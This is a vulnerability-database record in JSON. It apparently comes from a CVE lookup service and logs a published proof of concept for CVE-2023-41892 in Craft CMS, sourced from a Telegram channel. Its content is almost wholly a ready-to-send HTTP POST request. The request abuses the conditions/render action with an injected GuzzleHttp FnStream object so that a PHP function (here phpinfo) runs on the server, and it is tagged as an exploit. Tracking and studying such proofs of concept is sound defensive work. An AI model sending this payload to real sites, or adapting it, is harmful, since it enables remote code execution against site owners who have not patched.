{"uuid": "e507e795-7efc-48d1-83ae-4a5aabb8afcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/11", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-26T14:22:24.000000Z"}